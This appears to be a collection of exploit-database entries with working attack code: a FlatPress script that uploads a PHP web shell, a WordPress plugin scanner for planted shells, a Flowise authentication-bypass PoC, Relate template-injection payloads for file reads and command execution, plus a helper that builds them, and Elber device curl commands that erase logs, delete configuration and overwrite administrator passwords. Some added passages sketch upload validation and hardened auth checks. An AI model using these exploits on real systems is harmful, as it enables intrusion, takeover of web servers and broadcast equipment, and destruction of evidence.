<pre><code># Exploit Title: FlatPress v1.3 - Remote Command Execution
# Discovered by: Ahmet Ümit BAYRAM
# Discovered Date: 19.04.2024
# Vendor Homepage: https://www.flatpress.org
# Software Link: https://github.com/flatpressblog/flatpress/archive/1.3.zip
# Tested Version: 1.3 (latest)
# Tested on: MacOS

import requests
import time
import random
import string


def random_string(length=5):
    """Generate a random lowercase string (used as the uploaded shell's file name)."""
    letters = string.ascii_lowercase
    return ''.join(random.choice(letters) for i in range(length))


def login_and_upload(base_url, username, password):
    # The uploaded file is named after this value: five random letters plus .php
    filename = random_string() + ".php"
    login_url = f"http://{base_url}/login.php"
    upload_url = f"http://{base_url}/admin.php?p=uploader&amp;action=default"

    with requests.Session() as session:
        # Exploiting
        print("Exploiting...")
        time.sleep(1)

        # Login attempt
        login_data = {
            'user': username,
            'pass': password,
            'submit': 'Login'
        }
        print("Logging in...")
        response = session.post(login_url, data=login_data)
        time.sleep(1)

        # A logged-in admin page contains a "Logout" link
        if "Logout" in response.text:
            print("Login Successful!")
        else:
            print("Login Failed!")
            print(response.text)
            return

        # File upload attempt
        print("Shell uploading...")
        time.sleep(1)

        # Form data and files: a one-line PHP shell that runs the value of the 0 GET parameter.
        # The MIME type is client-controlled; the uploader does not reject the .php name.
        files = {
            'upload[]': (filename, '<?=`$_GET[0]`?>', 'text/php'),
        }
        # Nonce and referer values as hardcoded in the original exploit
        form_data = {
            '_wpnonce': '9e0ed04260',
            '_wp_http_referer': '/admin.php?p=uploader',
            'upload': 'Upload'
        }

        response = session.post(upload_url, files=files, data=form_data)

        # Note: the word "Upload" also appears on the uploader page itself, so this check
        # is optimistic; confirm success by requesting the shell URL.
        if "File(s) uploaded" in response.text or "Upload" in response.text:
            shell_url = f"http://{base_url}/fp-content/attachs/(unknown)"
            print(f"Your Shell is Ready: {shell_url}")
            time.sleep(1)
            print(f"Shell Usage: {shell_url}?0=command")
        else:
            print("Exploit Failed!")
            print(response.status_code, response.text)


# Example usage: python script.py siteadi.com username password
if __name__ == "__main__":
    import sys
    if len(sys.argv) != 4:
        print("Usage: script.py <base_url> <username> <password>")
    else:
        base_url, username, password = sys.argv[1:]
        login_and_upload(base_url, username, password)

</code></pre>
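The script above gets its shell onto the server because the admin uploader accepts a file named `<random>.php` with a client-chosen Content-Type and stores it under the web root. The validator below is an added illustration, not FlatPress code and not the project's fix, of the server-side checks that would reject such a file: decide on the file name rather than the client-supplied MIME type, allowlist extensions, reject every extension in a multi-extension name rather than only the last, and refuse names with path separators or a leading dot. The allowlist, the executable-extension list and the function name are this example's own assumptions.

```python
import os
import re

# Hypothetical allowlist for an attachment uploader (FlatPress's actual rules are not on this page).
ALLOWED_EXTENSIONS = {'jpg', 'jpeg', 'png', 'gif', 'pdf', 'txt', 'zip'}
# Extensions a typical Apache/PHP setup may execute; this list is never derived from the client's MIME type.
EXECUTABLE_EXTENSIONS = {'php', 'php3', 'php4', 'php5', 'php7', 'phps', 'phtml', 'phar',
                         'cgi', 'pl', 'py', 'sh'}
# One leading alphanumeric (so ".htaccess" is refused), then a bounded set of safe characters.
_SAFE_NAME = re.compile(r'^[A-Za-z0-9][A-Za-z0-9._-]{0,99}$')


def validate_upload(filename, content_type=None):
    """Return (accepted, reason) for an uploaded file name.

    content_type is accepted only to make the point that it is ignored: the exploit
    sends 'text/php', and a browser would send whatever the client chooses.
    """
    name = os.path.basename(filename)          # strip any directory component
    if name != filename or not _SAFE_NAME.match(name):
        return False, 'unsafe file name'
    parts = name.lower().split('.')
    if len(parts) < 2:
        return False, 'missing extension'
    exts = parts[1:]                           # every extension, e.g. ['php', 'jpg'] for shell.php.jpg
    for ext in exts:
        if ext in EXECUTABLE_EXTENSIONS:
            return False, f'executable extension .{ext}'
    if exts[-1] not in ALLOWED_EXTENSIONS:
        return False, f'extension .{exts[-1]} not allowed'
    return True, 'ok'


if __name__ == '__main__':
    # Constructed sample names: the exploit's shell, a double extension, a traversal attempt and a benign file
    for sample in ('abcde.php', 'shell.php.jpg', '../../x.jpg', '.htaccess', 'photo.jpg'):
        print(sample, validate_upload(sample, 'text/php'))
```

Name validation alone is not enough on its own: the attachment directory should also be served with script execution disabled (or placed outside the web root), so that a file which slips through is still only downloaded, never run.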
<pre><code># Exploit Title: Wordpress Plugin Background Image Cropper v1.2 - Remote Code Execution
# Date: 2024-04-16
# Author: Milad Karimi (Ex3ptionaL)
# Contact: miladgrayhat@gmail.com
# Zone-H: www.zone-h.org/archive/notifier=Ex3ptionaL
# Vendor Homepage: https://wordpress.org
# Software Link: https://wordpress.org/plugins/background-image-cropper/
# Version: 1.2
# Category : webapps
# Tested on: windows 10 , firefox

import sys, requests, re
from multiprocessing.dummy import Pool
from colorama import Fore
from colorama import init
init(autoreset=True)

# Console colours (the original referenced fg, fr and fc without defining them)
fg = Fore.GREEN
fr = Fore.RED
fc = Fore.CYAN

# PHP upload shell. It is defined in the original exploit but never sent anywhere:
# the script below only checks whether ups.php is already present on each target.
shell = """<?php echo "Ex3ptionaL"; echo "<br>".php_uname()."<br>"; echo "<form method='post' enctype='multipart/form-data'> <input type='file' name='zb'><input type='submit' name='upload' value='upload'></form>"; if($_POST['upload']) { if(@copy($_FILES['zb']['tmp_name'], $_FILES['zb']['name'])) { echo "eXploiting Done"; } else { echo "Failed to Upload."; } } ?>"""

requests.urllib3.disable_warnings()
headers = {'Connection': 'keep-alive',
           'Cache-Control': 'max-age=0',
           'Upgrade-Insecure-Requests': '1',
           'User-Agent': 'Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36',
           'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8',
           'Accept-Encoding': 'gzip, deflate',
           'Accept-Language': 'en-US,en;q=0.9,fr;q=0.8',
           'referer': 'www.google.com'}

# Target list: one host or URL per line in the file given as the first argument
try:
    target = [i.strip() for i in open(sys.argv[1], mode='r').readlines()]
except IndexError:
    path = str(sys.argv[0]).split('\\')
    exit('\n [!] Enter <' + path[len(path) - 1] + '> <sites.txt>')

# Path of the shell the scanner looks for, and the HTML fragment the author uses to recognise it
SHELL_PATH = '/wp-content/plugins/background-image-cropper/ups.php'
SHELL_MARKER = ('enctype="multipart/form-data" name="uploader" id="uploader">'
                '<input type="file" name="file" size="50">'
                '<input name="_upl" type="submit" id="_upl" value="Upload')


def URLdomain(site):
    """Reduce a URL to its bare host name (strip the scheme and any path)."""
    if site.startswith("http://"):
        site = site.replace("http://", "")
    elif site.startswith("https://"):
        site = site.replace("https://", "")
    pattern = re.compile('(.*)/')
    while re.findall(pattern, site):
        sitez = re.findall(pattern, site)
        site = sitez[0]
    return site


def FourHundredThree(url):
    """Try http:// then https://; record hosts where ups.php answers with the uploader form."""
    try:
        url = 'http://' + URLdomain(url)
        check = requests.get(url + SHELL_PATH, headers=headers, allow_redirects=True, timeout=15)
        if SHELL_MARKER in check.text:
            print(' -| ' + url + ' --> {}[Successfully]'.format(fg))
            open('Shells.txt', 'a').write(url + SHELL_PATH + '\n')
        else:
            url = 'https://' + URLdomain(url)
            check = requests.get(url + SHELL_PATH, headers=headers, allow_redirects=True,
                                 verify=False, timeout=15)
            if SHELL_MARKER in check.text:
                print(' -| ' + url + ' --> {}[Successfully]'.format(fg))
                open('Shells.txt', 'a').write(url + SHELL_PATH + '\n')
            else:
                print(' -| ' + url + ' --> {}[Failed]'.format(fr))
    except Exception:
        print(' -| ' + url + ' --> {}[Failed]'.format(fr))


mp = Pool(150)
mp.map(FourHundredThree, target)
mp.close()
mp.join()

print('\n [!] {}Saved in Shells.txt'.format(fc))
</code></pre>
<pre><code># Exploit Title: Flowise 1.6.5 - Authentication Bypass
# Date: 17-April-2024
# Exploit Author: Maerifat Majeed
# Vendor Homepage: https://flowiseai.com/
# Software Link: https://github.com/FlowiseAI/Flowise/releases
# Version: 1.6.5
# Tested on: mac-os
# CVE : CVE-2024-31621

Flowise versions up to and including 1.6.5 are vulnerable to an authentication bypass.
The code snippet

this.app.use((req, res, next) => {
    if (req.url.includes('/api/v1/')) {
        whitelistURLs.some((url) => req.url.includes(url)) ?
            next() : basicAuthMiddleware(req, res, next)
    } else next()
})

applies the authentication middleware to every endpoint under /api/v1 except a
few whitelisted ones. The check is a case-sensitive substring match on req.url,
so it only recognises the lowercase string /api/v1/, while the routes themselves
are matched case-insensitively (Express's default). A request whose path is
written as /API/V1/... or /Api/v1/... therefore never enters the if branch and
reaches the handler without basicAuthMiddleware running, bypassing authentication.

POC:
curl http://localhost:3000/Api/v1/credentials

For a seamless authentication bypass, use Burp Suite's Match and Replace rules in
the proxy settings: add a rule on the request first line replacing api/v1 with API/V1.

</code></pre>
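The decision logic of that middleware, ported to Python as an added illustration (this is not Flowise's code and not its fix), alongside a hardened version that decides on a normalised path instead of the raw request URL. The allowlist entries and the function names are this example's own assumptions; Flowise's real whitelist is not shown on this page.

```python
from urllib.parse import urlsplit

# Hypothetical allowlist standing in for Flowise's whitelistURLs.
WHITELIST = ['/api/v1/verify/apikey/', '/api/v1/prediction/']


def requires_basic_auth_vulnerable(url):
    """Port of the decision in the advisory's snippet: case-sensitive substring tests on req.url.

    '/Api/v1/credentials' does not contain '/api/v1/', so the function answers False and
    the request would go straight to next() without basicAuthMiddleware ever running.
    Because req.url is tested as a whole, an allowlisted string anywhere in it (query
    string included) also satisfies the second test.
    """
    if '/api/v1/' in url:
        return not any(entry in url for entry in WHITELIST)
    return False


def requires_basic_auth_hardened(url):
    """Same policy, decided on a normalised path.

    - Only the path component is examined, so nothing in the query string can influence it.
    - The path is lower-cased before comparison, mirroring Express's default case-insensitive
      routing: '/API/V1/x' and '/api/v1/x' reach the same handler, so they must get the same
      authentication decision.
    - Allowlist entries must match as a prefix of the path, not as a substring.
    """
    path = urlsplit(url).path.lower()
    if not path.startswith('/api/v1/'):
        return False
    return not any(path.startswith(entry) for entry in WHITELIST)


def compare(url):
    """Both decisions for one request target, for side-by-side inspection."""
    return {'url': url,
            'vulnerable': requires_basic_auth_vulnerable(url),
            'hardened': requires_basic_auth_hardened(url)}


if __name__ == '__main__':
    # Constructed request targets: the advisory's PoC, its upper-case variant, and a query-string probe
    for sample in ('/api/v1/credentials', '/Api/v1/credentials', '/API/V1/credentials',
                   '/api/v1/credentials?next=/api/v1/prediction/', '/static/app.js'):
        print(compare(sample))
```

The hardened variant still honours the original policy (no auth outside /api/v1, allowlisted prefixes exempt); it only changes what the comparison is performed on, which is where the bypass lives.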
<pre><code># Exploit Title: Relate Learning and Teaching System before 2024.1 - SSTI in the Markup Sandbox function leading to RCE
# Date: 19/04/2024
# Exploit Author: kai6u
# Vendor Homepage: https://github.com/inducer/
# Software Link: https://github.com/inducer/relate
# Affected Version: before 2024.1 (https://github.com/inducer/relate/commit/2fdbd4480a2d0a45c746639be244a61a0d4112b6)
# Fixed Version: 2024.1 (https://github.com/inducer/relate/commit/d9fa7dcb84b8e5a64ce78ced4f56cdd61c0d59aa)
# Tested on: Ubuntu 22.04
# Summary:
Server-side template injection (SSTI) in the Markup Sandbox function of the Relate Learning and Teaching System

# Description:

* 【Prerequisite】
  * The attacker has obtained the privilege to use the Markup Sandbox, for example by being logged in as a course administrator.

* The SSTI is in the `Markup Sandbox` feature, which lets users check Markdown content before publishing it. The sandbox evaluates `{{ ... }}` template expressions in the submitted text, so the Python object graph is reachable from the expression.

1) First, the attacker enters the following payload in the Markup Sandbox.
  * Payload:
  * `{{ 'abc'.__class__.__base__.__subclasses__()[111].__subclasses__()[0].__subclasses__()[0]('/etc/passwd').read() }}`
  * Note that the subclass index in the payload depends on the Python version, so it must be adjusted to the target environment. In the author's environment index 111 is the position of `_io._IOBase`; its first subclass (`_RawIOBase`) and that class's first subclass (`FileIO`) open and read the file.

2) Click Preview with the payload above.
* The contents of the `/etc/passwd` file are then shown in the Content Preview block.
* This is an arbitrary file read (LFI): the file should not be readable through the application.

3) Next, the attacker changes the subclass index to the one of `subprocess.Popen` to execute arbitrary commands (`stdout=-1` is `subprocess.PIPE`, so the command output is returned into the template).
  * Payload:
  * `{{ 'abc'.__class__.__base__.__subclasses__()[210]('whoami',shell=True,stdout=-1).communicate()[0].strip() }}`

4) Click Preview with the payload above.

* The result shows `ubuntu`, the output of the whoami command.
* This is classified as an RCE vulnerability and is very dangerous because the server can be taken over directly from the application.
* An attacker can use this to spawn a reverse shell.

# References
https://book.hacktricks.xyz/v/jp/pentesting-web/ssti-server-side-template-injection


</code></pre>
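The advisory points out that the indices `[111]` and `[210]` depend on the interpreter. The helper below is an added illustration, not part of Relate or of the advisory: run under the same Python version as the target, it derives those indices by class name instead of by guessing and rebuilds the two payloads from them. The function names are this example's own.

```python
import subprocess  # the target process must also have imported subprocess for the Popen payload to exist


def find_subclass_chain(names):
    """Walk object.__subclasses__() by class name and return (indices, class reached).

    names is e.g. ('_IOBase', '_RawIOBase', 'FileIO'); the indices are the positions the
    payload has to use in this interpreter. Raises LookupError if a name is absent.
    """
    cls = object
    indices = []
    for name in names:
        subs = cls.__subclasses__()
        for idx, candidate in enumerate(subs):
            if candidate.__name__ == name:
                indices.append(idx)
                cls = candidate
                break
        else:
            raise LookupError(f'{name!r} is not a direct subclass of {cls.__name__}')
    return indices, cls


def popen_index():
    """Position of subprocess.Popen among object's direct subclasses (the [210] slot in the advisory).

    Matching on module and name avoids the Popen classes that multiprocessing defines.
    """
    for idx, candidate in enumerate(object.__subclasses__()):
        if candidate.__module__ == 'subprocess' and candidate.__name__ == 'Popen':
            return idx
    raise LookupError('subprocess.Popen is not present in this interpreter')


def enumeration_payload():
    """Payload that makes the sandbox list the subclasses itself, for when this helper cannot run on the target."""
    return "{{ 'abc'.__class__.__base__.__subclasses__() }}"


def file_read_payload(path, indices):
    """The advisory's file-read payload with the index chain filled in."""
    chain = ''.join(f'.__subclasses__()[{i}]' for i in indices)
    return "{{ 'abc'.__class__.__base__" + chain + "('" + path + "').read() }}"


def command_payload(cmd, idx):
    """The advisory's command-execution payload with the Popen index filled in."""
    return ("{{ 'abc'.__class__.__base__.__subclasses__()[" + str(idx) + "]('" + cmd
            + "',shell=True,stdout=-1).communicate()[0].strip() }}")


if __name__ == '__main__':
    indices, _ = find_subclass_chain(('_IOBase', '_RawIOBase', 'FileIO'))
    print(file_read_payload('/etc/passwd', indices))
    print(command_payload('whoami', popen_index()))
```

When no matching local interpreter is at hand, preview `enumeration_payload()` in the sandbox first: the rendered list of class names gives the same positions, which is how the indices in the advisory would have been found.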
<pre><code><br />Elber Wayber Analog/Digital Audio STL 4.00 Device Config<br /><br /><br />Vendor: Elber S.r.l.<br />Product web page: https://www.elber.it<br />Affected version: Version 3.0.0 Revision 1553 (Firmware Ver. 4.00 Rev. 1501)<br /> Version 3.0.0 Revision 1542 (Firmware Ver. 4.00 Rev. 1516)<br /> Version 3.0.0 Revision 1530 (Firmware Ver. 4.00 Rev. 1516)<br /> Version 3.0.0 Revision 1530 (Firmware Ver. 4.00 Rev. 1501)<br /> Version 3.0.0 Revision 1480 (Firmware Ver. 3.00 Rev. 1350)<br /> Version 3.0.0 Revision 1480 (Firmware Ver. 3.00 Rev. 1342)<br /> Version 1.0.0 Revision 1202 (Firmware Ver. 2.00 Rev. 2131)<br /><br />Summary: Wayber II is the name of an analogue/digital microwave link<br />able to transport a Mono or a MPX stereo signal from studio to audio<br />transmitter. Compact and reliable, it features very high quality and<br />modern technology both in signal processing and microwave section leading<br />to outstanding performances.<br /><br />Desc: The device suffers from an unauthenticated device configuration and<br />client-side hidden functionality disclosure.<br /><br />Tested on: NBFM Controller<br /> embOS/IP<br /><br /><br />Vulnerability discovered by Gjoko 'LiquidWorm' Krstic<br /> @zeroscience<br /><br /><br />Advisory ID: ZSL-2024-5823<br />Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5823.php<br /><br /><br />18.08.2023<br /><br />--<br /><br /><br /># Config fan<br />$ curl 'http://TARGET/json_data/fan?fan_speed=&fan_target=&warn_temp=&alarm_temp='<br />Configuration applied<br /><br /># Delete config<br />$ curl 'http://TARGET/json_data/conf_cmd?index=4&cmd=2'<br />File delete successfully<br /><br /># Launch upgrade<br />$ curl 'http://TARGET/json_data/conf_cmd?index=4&cmd=1'<br />Upgrade launched Successfully<br /><br /># Log erase<br />$ curl 'http://TARGET/json_data/erase_log.js?until=-2'<br />Logs erased<br /><br /># Until:<br /># =0 ALL<br /># =-2 Yesterday<br /># =-8 Last week<br /># =-15 Last two 
weeks<br /># =-22 Last three weeks<br /># =-31 Last month<br /><br /># Set RX config<br />$ curl 'http://TARGET/json_data/NBFMV2RX.setConfig?freq=2480000&freq_offset=0&mute=1&sq_thresh=-90.0&dec_mode=0&lr_swap=0&preemph=0&preemph_const=0&deemph=0&deemph_const=1&ch_lr_enable=0&ch_r_gain=0.0&ch_l_gain=0.0&ch_adj_ctrl=0&ch_lr_att=1&mpxdig_att=0&pilot_trim=0.0&mpxdig_gain=0.0&rds_trim=0.0&delay_enable=0&local_rds=0&output_delay=0&pi_code=0___&mpx1_enable=1&mpx2_enable=1&sca1_enable=1&sca2_enable=0&mpx1_att=0&mpx2_att=0&sca1_att=0&sca2_att=0&mpx1_gain=0.0&mpx2_gain=0.0&sca1_gain=0.0&sca2_gain=0.0&limiter_enable=false&lim_1_gain=0.0+dB&lim_1_th=0.0+kHz&lim_1_alpha=0.0+%25&setupTime=0.0+ms&holdTime=0.0+ms&releaseFactor=0.0+dB%2Fsec&lim_2_en=false&lim_2_gain=0.0+dB&lim_2_th=0.0+kHz&rds_gen=false&rt_PI=&rt_PS=&rt_plus_en=false&rt_line_A=&rt_line_B=&rt_AF=&rf_trap=0&output_trap=0'<br />RX Config Applied Successfully<br /><br /># Show factory window and FPGA upload (Console)<br />> cleber_show_factory_wnd()<br /><br /># Etc.<br /></code></pre>
<pre><code><br />Elber Wayber Analog/Digital Audio STL 4.00 Authentication Bypass<br /><br /><br />Vendor: Elber S.r.l.<br />Product web page: https://www.elber.it<br />Affected version: Version 3.0.0 Revision 1553 (Firmware Ver. 4.00 Rev. 1501)<br /> Version 3.0.0 Revision 1542 (Firmware Ver. 4.00 Rev. 1516)<br /> Version 3.0.0 Revision 1530 (Firmware Ver. 4.00 Rev. 1516)<br /> Version 3.0.0 Revision 1530 (Firmware Ver. 4.00 Rev. 1501)<br /> Version 3.0.0 Revision 1480 (Firmware Ver. 3.00 Rev. 1350)<br /> Version 3.0.0 Revision 1480 (Firmware Ver. 3.00 Rev. 1342)<br /> Version 1.0.0 Revision 1202 (Firmware Ver. 2.00 Rev. 2131)<br /><br />Summary: Wayber II is the name of an analogue/digital microwave link<br />able to transport a Mono or a MPX stereo signal from studio to audio<br />transmitter. Compact and reliable, it features very high quality and<br />modern technology both in signal processing and microwave section leading<br />to outstanding performances.<br /><br />Desc: The device suffers from an authentication bypass vulnerability through<br />a direct and unauthorized access to the password management functionality. The<br />issue allows attackers to bypass authentication by manipulating the set_pwd<br />endpoint that enables them to overwrite the password of any user within the<br />system. 
This grants unauthorized, administrative access to protected areas
of the application, compromising the device's security.

--------------------------------------------------------------------------
/modules/pwd.html
------------------
50: function apply_pwd(level, pwd)
51: {
52:   $.get("json_data/set_pwd", {lev:level, pass:pwd},
53:     function(data){
54:       //$.alert({title:'Operation',text:data});
55:       show_message(data);
56:     }).fail(function(error){
57:       show_message('Error ' + error.status, 'error');
58:     });
59: }

--------------------------------------------------------------------------

Tested on: NBFM Controller
           embOS/IP


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2024-5822
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5822.php


18.08.2023

--


# Overwrite the administrator (level 2) password without authenticating.
# Quote the URL: an unquoted & makes the shell background curl and treat pass=... as an assignment.
$ curl -s 'http://[TARGET]/json_data/set_pwd?lev=2&pass=admin1234'

Ref (lev param):

Level 7 = SNMP Write Community (snmp_write_pwd)
Level 6 = SNMP Read Community (snmp_read_pwd)
Level 5 = Custom Password? hidden. (custom_pwd)
Level 4 = Display Password (display_pwd)?
Level 2 = Administrator Password (admin_pwd)
Level 1 = Super User Password (puser_pwd)
Level 0 = User Password (user_pwd)
</code></pre>
<pre><code><br />Elber ESE DVB-S/S2 Satellite Receiver 1.5.x Device Config<br /><br /><br />Vendor: Elber S.r.l.<br />Product web page: https://www.elber.it<br />Affected version: 1.5.179 Revision 904<br /> 1.5.56 Revision 884<br /> 1.229 Revision 440<br /><br />Summary: ESE (Elber Satellite Equipment) product line, designed for the<br />high-end radio contribution and distribution market, where quality and<br />reliability are most important. The Elber IRD (Integrated Receiver Decoder)<br />ESE-01 offers a professional audio quality (and composite video) at an<br />excellent quality/price ratio. The development of digital satellite contribution<br />networks and the need to connect a large number of sites require a cheap<br />but reliable and performing satellite receiver with integrated decoder.<br /><br />Desc: The device suffers from an unauthenticated device configuration and<br />client-side hidden functionality disclosure.<br /><br />Tested on: NBFM Controller<br /> embOS/IP<br /><br /><br />Vulnerability discovered by Gjoko 'LiquidWorm' Krstic<br /> @zeroscience<br /><br /><br />Advisory ID: ZSL-2024-5821<br />Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5821.php<br /><br /><br />18.08.2023<br /><br />--<br /><br /><br /># Config fan<br />$ curl 'http://TARGET/json_data/fan?fan_speed=&fan_target=&warn_temp=&alarm_temp='<br />Configuration applied<br /><br /># Delete config<br />$ curl 'http://TARGET/json_data/conf_cmd?index=4&cmd=2'<br />File delete successfully<br /><br /># Launch upgrade<br />$ curl 'http://TARGET/json_data/conf_cmd?index=4&cmd=1'<br />Upgrade launched Successfully<br /><br /># Log erase<br />$ curl 'http://TARGET/json_data/erase_log.js?until=-2'<br />Logs erased<br /><br /># Until:<br /># =0 ALL<br /># =-2 Yesterday<br /># =-8 Last week<br /># =-15 Last two weeks<br /># =-22 Last three weeks<br /># =-31 Last month<br /><br /># Set RX config<br />$ curl 
'http://TARGET/json_data/NBFMV2RX.setConfig?freq=2480000&freq_offset=0&mute=1&sq_thresh=-90.0&dec_mode=0&lr_swap=0&preemph=0&preemph_const=0&deemph=0&deemph_const=1&ch_lr_enable=0&ch_r_gain=0.0&ch_l_gain=0.0&ch_adj_ctrl=0&ch_lr_att=1&mpxdig_att=0&pilot_trim=0.0&mpxdig_gain=0.0&rds_trim=0.0&delay_enable=0&local_rds=0&output_delay=0&pi_code=0___&mpx1_enable=1&mpx2_enable=1&sca1_enable=1&sca2_enable=0&mpx1_att=0&mpx2_att=0&sca1_att=0&sca2_att=0&mpx1_gain=0.0&mpx2_gain=0.0&sca1_gain=0.0&sca2_gain=0.0&limiter_enable=false&lim_1_gain=0.0+dB&lim_1_th=0.0+kHz&lim_1_alpha=0.0+%25&setupTime=0.0+ms&holdTime=0.0+ms&releaseFactor=0.0+dB%2Fsec&lim_2_en=false&lim_2_gain=0.0+dB&lim_2_th=0.0+kHz&rds_gen=false&rt_PI=&rt_PS=&rt_plus_en=false&rt_line_A=&rt_line_B=&rt_AF=&rf_trap=0&output_trap=0'<br />RX Config Applied Successfully<br /><br /># Show factory window and FPGA upload (Console)<br />> cleber_show_factory_wnd()<br /><br /># Etc.<br /></code></pre>
<pre><code><br />Elber ESE DVB-S/S2 Satellite Receiver 1.5.x Authentication Bypass<br /><br /><br />Vendor: Elber S.r.l.<br />Product web page: https://www.elber.it<br />Affected version: 1.5.179 Revision 904<br /> 1.5.56 Revision 884<br /> 1.229 Revision 440<br /><br />Summary: ESE (Elber Satellite Equipment) product line, designed for the<br />high-end radio contribution and distribution market, where quality and<br />reliability are most important. The Elber IRD (Integrated Receiver Decoder)<br />ESE-01 offers a professional audio quality (and composite video) at an<br />excellent quality/price ratio. The development of digital satellite contribution<br />networks and the need to connect a large number of sites require a cheap<br />but reliable and performing satellite receiver with integrated decoder.<br /><br />Desc: The device suffers from an authentication bypass vulnerability through<br />a direct and unauthorized access to the password management functionality. The<br />issue allows attackers to bypass authentication by manipulating the set_pwd<br />endpoint that enables them to overwrite the password of any user within the<br />system. 
This grants unauthorized, administrative access to protected areas
of the application, compromising the device's security.

--------------------------------------------------------------------------
/modules/pwd.html
------------------
50: function apply_pwd(level, pwd)
51: {
52:   $.get("json_data/set_pwd", {lev:level, pass:pwd},
53:     function(data){
54:       //$.alert({title:'Operation',text:data});
55:       show_message(data);
56:     }).fail(function(error){
57:       show_message('Error ' + error.status, 'error');
58:     });
59: }

--------------------------------------------------------------------------

Tested on: NBFM Controller
           embOS/IP


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2024-5820
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5820.php


18.08.2023

--


# Overwrite the administrator (level 2) password without authenticating.
# Quote the URL: an unquoted & makes the shell background curl and treat pass=... as an assignment.
$ curl -s 'http://[TARGET]/json_data/set_pwd?lev=2&pass=admin1234'

Ref (lev param):

Level 7 = SNMP Write Community (snmp_write_pwd)
Level 6 = SNMP Read Community (snmp_read_pwd)
Level 5 = Custom Password? hidden. (custom_pwd)
Level 4 = Display Password (display_pwd)?
Level 2 = Administrator Password (admin_pwd)
Level 1 = Super User Password (puser_pwd)
Level 0 = User Password (user_pwd)
</code></pre>
<pre><code><br />Elber Reble610 M/ODU XPIC IP-ASI-SDH Microwave Link Device Config<br /><br /><br />Vendor: Elber S.r.l.<br />Product web page: https://www.elber.it<br />Affected version: 0.01 Revision 0<br /><br />Summary: The REBLE610 features an accurate hardware design, absence of<br />internal cabling and full modularity. The unit is composed by a basic<br />chassis with 4 extractable boards which makes maintenance and critical<br />operations, like frequency modification, easy and efficient. The modular<br />approach has brought to the development of the digital processing module<br />(containing modulator, demodulator and data interface) and the RF module<br />(containing Transmitter, Receiver and channel filters). From an RF point<br />of view, the new transmission circuitry is able to guarantee around 1 Watt<br />with every modulation scheme, introducing, in addition, wideband precorrection<br />(up to 1GHz depending on frequency band).<br /><br />Desc: The device suffers from an unauthenticated device configuration and<br />client-side hidden functionality disclosure.<br /><br />Tested on: NBFM Controller<br /> embOS/IP<br /><br /><br />Vulnerability discovered by Gjoko 'LiquidWorm' Krstic<br /> @zeroscience<br /><br /><br />Advisory ID: ZSL-2024-5819<br />Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5819.php<br /><br /><br />18.08.2023<br /><br />--<br /><br /><br /># Config fan<br />$ curl 'http://TARGET/json_data/fan?fan_speed=&fan_target=&warn_temp=&alarm_temp='<br />Configuration applied<br /><br /># Delete config<br />$ curl 'http://TARGET/json_data/conf_cmd?index=4&cmd=2'<br />File delete successfully<br /><br /># Launch upgrade<br />$ curl 'http://TARGET/json_data/conf_cmd?index=4&cmd=1'<br />Upgrade launched Successfully<br /><br /># Log erase<br />$ curl 'http://TARGET/json_data/erase_log.js?until=-2'<br />Logs erased<br /><br /># Until:<br /># =0 ALL<br /># =-2 Yesterday<br /># =-8 Last week<br /># =-15 Last two weeks<br 
/># =-22 Last three weeks<br /># =-31 Last month<br /><br /># Set RX config<br />$ curl 'http://TARGET/json_data/NBFMV2RX.setConfig?freq=2480000&freq_offset=0&mute=1&sq_thresh=-90.0&dec_mode=0&lr_swap=0&preemph=0&preemph_const=0&deemph=0&deemph_const=1&ch_lr_enable=0&ch_r_gain=0.0&ch_l_gain=0.0&ch_adj_ctrl=0&ch_lr_att=1&mpxdig_att=0&pilot_trim=0.0&mpxdig_gain=0.0&rds_trim=0.0&delay_enable=0&local_rds=0&output_delay=0&pi_code=0___&mpx1_enable=1&mpx2_enable=1&sca1_enable=1&sca2_enable=0&mpx1_att=0&mpx2_att=0&sca1_att=0&sca2_att=0&mpx1_gain=0.0&mpx2_gain=0.0&sca1_gain=0.0&sca2_gain=0.0&limiter_enable=false&lim_1_gain=0.0+dB&lim_1_th=0.0+kHz&lim_1_alpha=0.0+%25&setupTime=0.0+ms&holdTime=0.0+ms&releaseFactor=0.0+dB%2Fsec&lim_2_en=false&lim_2_gain=0.0+dB&lim_2_th=0.0+kHz&rds_gen=false&rt_PI=&rt_PS=&rt_plus_en=false&rt_line_A=&rt_line_B=&rt_AF=&rf_trap=0&output_trap=0'<br />RX Config Applied Successfully<br /><br /># Show factory window and FPGA upload (Console)<br />> cleber_show_factory_wnd()<br /><br /># Etc.<br /></code></pre>
<pre><code><br />Elber Reble610 M/ODU XPIC IP-ASI-SDH Microwave Link Authentication Bypass<br /><br /><br />Vendor: Elber S.r.l.<br />Product web page: https://www.elber.it<br />Affected version: 0.01 Revision 0<br /><br />Summary: The REBLE610 features an accurate hardware design, absence of<br />internal cabling and full modularity. The unit is composed by a basic<br />chassis with 4 extractable boards which makes maintenance and critical<br />operations, like frequency modification, easy and efficient. The modular<br />approach has brought to the development of the digital processing module<br />(containing modulator, demodulator and data interface) and the RF module<br />(containing Transmitter, Receiver and channel filters). From an RF point<br />of view, the new transmission circuitry is able to guarantee around 1 Watt<br />with every modulation scheme, introducing, in addition, wideband precorrection<br />(up to 1GHz depending on frequency band).<br /><br />Desc: The device suffers from an authentication bypass vulnerability through<br />a direct and unauthorized access to the password management functionality. The<br />issue allows attackers to bypass authentication by manipulating the set_pwd<br />endpoint that enables them to overwrite the password of any user within the<br />system. 
This grants unauthorized, administrative access to protected areas
of the application, compromising the device's security.

--------------------------------------------------------------------------
/modules/pwd.html
------------------
50: function apply_pwd(level, pwd)
51: {
52:   $.get("json_data/set_pwd", {lev:level, pass:pwd},
53:     function(data){
54:       //$.alert({title:'Operation',text:data});
55:       show_message(data);
56:     }).fail(function(error){
57:       show_message('Error ' + error.status, 'error');
58:     });
59: }

--------------------------------------------------------------------------

